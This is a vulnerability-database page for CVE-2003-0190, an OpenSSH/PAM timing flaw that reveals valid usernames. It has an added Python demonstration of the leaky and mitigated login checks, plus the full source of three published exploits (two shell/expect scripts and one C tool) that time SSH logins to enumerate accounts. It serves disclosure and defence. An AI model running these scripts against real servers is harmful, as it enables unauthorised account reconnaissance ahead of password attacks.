CVE-2003-0190 : Detail


6.86%V3
Network
2003-05-01 22:00 +00:00
2022-12-12 23:00 +00:00


Descriptions

OpenSSH-portable (OpenSSH) 3.6.1p1 and earlier with PAM support enabled immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.

Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-203 Observable Discrepancy
The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not.
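The discrepancy described in the CVE text and in CWE-203 above comes from a login path that rejects an unknown user before doing the expensive work it would do for a known one, so the reply arrives measurably faster. The following is an added example, not code from this CVE record or from OpenSSH: a minimal password check in the vulnerable shape next to the mitigated shape, where unknown users are run through the same key-derivation and comparison against a decoy record before being rejected. All users, passwords and the cost parameter are constructed; `kdf_work` and `best_of` are instrumentation helpers invented for the example.

```python
# Added example (not part of the CVE record or of OpenSSH): a minimal login
# check that reproduces the CWE-203 pattern behind CVE-2003-0190 and the
# usual mitigation. All users, passwords and cost parameters are constructed.
import hashlib
import hmac
import os
import secrets
import time

ITERATIONS = 20_000            # constructed KDF cost; real deployments use more
_USERS = {}                    # constructed account store: user -> (salt, hash)
_KDF_CALLS = [0]               # instrumentation: how many KDF runs a call triggers


def _derive(password: str, salt: bytes) -> bytes:
    """Slow password hash; this is the work a remote caller can time."""
    _KDF_CALLS[0] += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def register(user: str, password: str) -> None:
    salt = os.urandom(16)
    _USERS[user] = (salt, _derive(password, salt))


# Decoy record used for unknown users, so their code path costs the same as a
# real account's (same KDF, same iteration count).
_DECOY_SALT = os.urandom(16)
_DECOY_HASH = _derive(secrets.token_hex(16), _DECOY_SALT)


def auth_leaky(user: str, password: str) -> bool:
    """Vulnerable shape: unknown users are rejected before any KDF work,
    so the reply comes back faster than for a real account."""
    record = _USERS.get(user)
    if record is None:
        return False
    salt, expected = record
    return hmac.compare_digest(_derive(password, salt), expected)


def auth_uniform(user: str, password: str) -> bool:
    """Mitigated shape: always run the KDF and the comparison, against the
    decoy record when the user is unknown, and only then reject."""
    record = _USERS.get(user)
    known = record is not None
    salt, expected = record if known else (_DECOY_SALT, _DECOY_HASH)
    matched = hmac.compare_digest(_derive(password, salt), expected)
    return matched and known


def kdf_work(auth_fn, user: str, password: str) -> int:
    """Number of KDF evaluations one authentication attempt performs."""
    before = _KDF_CALLS[0]
    auth_fn(user, password)
    return _KDF_CALLS[0] - before


def best_of(auth_fn, user: str, password: str, rounds: int = 5) -> float:
    """Minimum wall-clock time over several attempts, in seconds."""
    best = float("inf")
    for _ in range(rounds):
        start = time.perf_counter()
        auth_fn(user, password)
        best = min(best, time.perf_counter() - start)
    return best


if __name__ == "__main__":
    register("alice", "correct horse battery staple")
    for fn in (auth_leaky, auth_uniform):
        known = best_of(fn, "alice", "wrong password")
        unknown = best_of(fn, "mallory", "wrong password")
        print(f"{fn.__name__:13s} known={known * 1e3:7.2f} ms  "
              f"unknown={unknown * 1e3:7.2f} ms  "
              f"kdf_calls(unknown)={kdf_work(fn, 'mallory', 'x')}")
```

Running the block prints the best-of-five timings for a known and an unknown user under both shapes: `auth_leaky` answers the unknown user with zero KDF calls, while `auth_uniform` spends one KDF call on either. The decoy has to use the same KDF and cost as the real records; if per-account parameters differ (the situation the third exploit's header notes for CVE-2006-5229), the timing gap reappears even with a decoy path in place.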

Metrics

Metric Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of other CVEs. The percentile is thus a way to compare the EPSS score of one CVE with that of all others.

Exploit information

Exploit Database EDB-ID : 26

Publication date : 2003-05-01 22:00 +00:00
Author : Nicolas Couture
EDB Verified : Yes

#!/bin/sh
# OpenSSH <= 3.6.p1 - User Identification.
# Nicolas Couture - [email protected]
#
# Description:
# -Tells you wether or not a user exist on
# a distant server running OpenSSH.
#
# Usage:
# -You NEED to have the host's public key
# before executing this script.
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Fact Sheet:                                   #
#                                               #
# o It is really accurate against               #
#   redhat boxes.                               #
# o Linux boxes running grsecurity              #
#   has 10 seconds delay on both                #
#   valid AND invalid user login                #
#   attempts.                                   #
# o *BSD boxes are not vulnerables and          #
#   always has 10 seconds delay like            #
#   Linux-Grsec + network protection            #
#                                               #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# History:
# Thu May 1 15:41:18 EDT 2003
# ; Script started.
# Thu May 1 16:42:30 EDT 2003
# ; Script is functional.
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

# Let the user know how we work.
usage(){
    echo "$0 <user> <host>"
    exit 1
}

# Verify the arguments.
[ $# != 2 ] && usage

# Variables.
USER="$1"
HOST="$2"

#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script functions #
#=-=-=-=-=-=-=-=-=-=-=-=-=#

# Expect script for password.
expasswd() {
cat << EOF > expasswd
spawn $SSHCMD
expect password:
send '\r'
interact
EOF
}

# Expect script for error.
experror() {
cat << EOF > experror
spawn expect -f expasswd
expect again.
exit 1593
interact
EOF
}

#=-=-=-=-=-=-=-=-=-=#
# -Fake user timing #
#=-=-=-=-=-=-=-=-=-=#

# OpenSSH client command for inexisting user.
export SSHCMD="ssh nicolas_couture@$HOST"

# Build new expect script.
expasswd
experror

# Timing.
FDATE0=`date '+%s'`
echo "[-] Calculating fake user timeout..."
expect -f experror 1> /dev/null 2> /dev/null
FDATE1=`date '+%s'`

# Fake user timeout.
FUTO=`echo $FDATE1 - $FDATE0 | bc`
echo "[+] Found $FUTO."

#=-=-=-=-=-=-=-=#
# -$USER timing #
#=-=-=-=-=-=-=-=#

# OpenSSH command.
export SSHCMD="ssh $USER@$HOST"

# Build new expect scripts.
expasswd
experror

DATE0=`date '+%s'`
# (original printed the undefined $SERVER here; $HOST is the variable set above)
echo "[-] Calculating $USER timeout on $HOST..."
expect -f experror 1> /dev/null 2> /dev/null
DATE1=`date '+%s'`

# $USER timeout.
END=`echo $DATE1 - $DATE0 | bc`
echo "[+] Found $END."

#=-=-=-=-=#
# -Result #
#=-=-=-=-=#
if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
    echo "This box is not vulnerable."
    exit 1
fi

# Use of our magic skills.
if [ "$FUTO" -lt "$END" ]; then
    echo "$USER exist on $HOST."
elif [ "$FUTO" -ge "$END" ]; then
    echo "$USER doesn't exist on $HOST."
else
    echo "Segmentation fault."
    exit 13
fi

# Remove tmp files.
rm -rf expasswd experror

# EOF

# milw0rm.com [2003-05-02]
Exploit Database EDB-ID : 25

Publication date : 2003-04-29 22:00 +00:00
Author : Maurizio Agazzini
EDB Verified : Yes

/*
 * SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
 * Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
 *
 *
 * Vulnerability discovered by Marco Ivaldi <[email protected]>
 * Proof of concept code by Maurizio Agazzini <[email protected]>
 *
 * Tested against Red Hat, Mandrake, and Debian GNU/Linux.
 *
 * Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
 *
 * $ tar xvfz openssh-3.6.1p1.tar.gz
 * $ patch -p0 <openssh-3.6.1p1_brute.diff
 * patching file openssh-3.6.1p1/ssh.c
 * patching file openssh-3.6.1p1/sshconnect.c
 * patching file openssh-3.6.1p1/sshconnect1.c
 * patching file openssh-3.6.1p1/sshconnect2.c
 * $ cd openssh-3.6.1p1
 * $ ./configure
 * $ make
 * $ cc ../ssh_brute.c -o ssh_brute
 * $ ./ssh_brute 1 list.txt 192.168.0.66
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen(); missing in the original listing */
#include <sys/wait.h>

/* an illegal user */
#define NO_USER "not_val_user"

/* path of the patched ssh */
#define PATH_SSH "./ssh"

/* max time range for invalid user */
#define TIME_RANGE 3

int main(int argc, char *argv[])
{
    FILE * in;
    char buffer[2000], username[100], *host;
    int time_non_valid = 0, time_user = 0;
    int version = 1, i = 0, ret;

    fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n");
    fprintf(stderr, " Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved\n");

    /* three arguments are used below (argv[1..3]); the original checked argc < 3 */
    if (argc < 4) {
        fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]);
        exit(-1);
    }

    version = atoi(argv[1]);
    host = argv[3];

    if ( ( in = fopen(argv[2], "r") ) == NULL ) {
        fprintf(stderr, "\n Can't open %s\n", argv[2]);
        exit(-1);
    }

    /* test an illegal user */
    printf("\n Testing an illegal user\t: ");
    fflush(stdout);

    sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, NO_USER, host);

    for (i = 0; i < 3; i++) {
        ret = system(buffer);
        time_non_valid += WEXITSTATUS(ret);
    }

    time_non_valid /= 3;
    printf("%d second(s)\n\n", time_non_valid);
    time_non_valid += TIME_RANGE;

    /* test supplied users */
    fscanf(in, "%s", username);

    while ( !feof(in) ) {
        printf(" Testing login %s\t", username);
        if (strlen(username) <= 8)
            printf("\t");
        printf(": ");
        fflush( stdout );

        sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, username, host);

        ret = system(buffer);
        time_user = WEXITSTATUS(ret);

        if (time_user <= time_non_valid)
            printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)]\n", time_user);
        else {
            /* valid user? test it again to be sure */
            ret = system(buffer);
            time_user = WEXITSTATUS(ret);

            if (time_user <= time_non_valid)
                printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)] [2 test]\n", time_user);
            else
                printf("\E[32m\E[1mUSER OK\E[m\t[%d second(s)]\n", time_user);
        }

        fscanf(in, "%s", username);
    }

    fclose(in);
    printf("\n");
    exit(0);
}

// milw0rm.com [2003-04-30]
Exploit Database EDB-ID : 3303

Publication date : 2007-02-12 23:00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

#!/bin/bash
#
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
#
# raptor_sshtime - [Open]SSH remote timing attack exploit
# Copyright (c) 2006 Marco Ivaldi <[email protected]>
#
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
# sends an error message when a user does not exist, which allows remote
# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
#
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
# and possibly under limited configurations, allows remote attackers to
# determine valid usernames via timing discrepancies in which responses take
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
# NOTE: as of 20061014, it appears that this issue is dependent on the use of
# manually-set passwords that causes delays when processing /etc/shadow due to
# an increased number of rounds (CVE-2006-5229).
#
# This is a simple shell script based on expect meant to remotely analyze
# timing differences in sshd "Permission denied" replies. Depending on OpenSSH
# version and configuration, it may lead to disclosure of valid usernames.
#
# Usage example:
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#

# Some vars
port=22

# Command line
host=$1
dict=$2

# Local functions
function head() {
	echo ""
	echo "raptor_sshtime - [Open]SSH remote timing attack exploit"
	echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>"
	echo ""
}

function foot() {
	echo ""
	exit 0
}

function usage() {
	head
	echo "[make sure the target hostkey has been approved before]"
	echo ""
	echo "usage : ./sshtime <target> <wordlist>"
	echo "example: ./sshtime 192.168.0.1 dict.txt"
	foot
}

function notfound() {
	head
	echo "error : expect interpreter not found!"
	foot
}

# Check if expect is there
expect=`which expect 2>/dev/null`
if [ $? -ne 0 ]; then
	notfound
fi

# Input control
if [ -z "$2" ]; then
	usage
fi

# Perform the bruteforce attack
head
for user in `cat $dict`
do
	echo -ne "$user@$host\t\t"
	(time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
done
foot

# milw0rm.com [2007-02-13]

Products Mentioned

Configuration 0

Openbsd>>Openssh >> Version To (excluding) 3.6.1

Openbsd>>Openssh >> Version 3.6.1

Configuration 0

Openpkg>>Openpkg >> Version 1.2

Openpkg>>Openpkg >> Version 1.3

Configuration 0

Siemens>>Scalance_x204rna_ecc_firmware >> Version To (excluding) 3.2.7

Siemens>>Scalance_x204rna_ecc >> Version -

Configuration 0

Siemens>>Scalance_x204rna_firmware >> Version To (excluding) 3.2.7

Siemens>>Scalance_x204rna >> Version -

References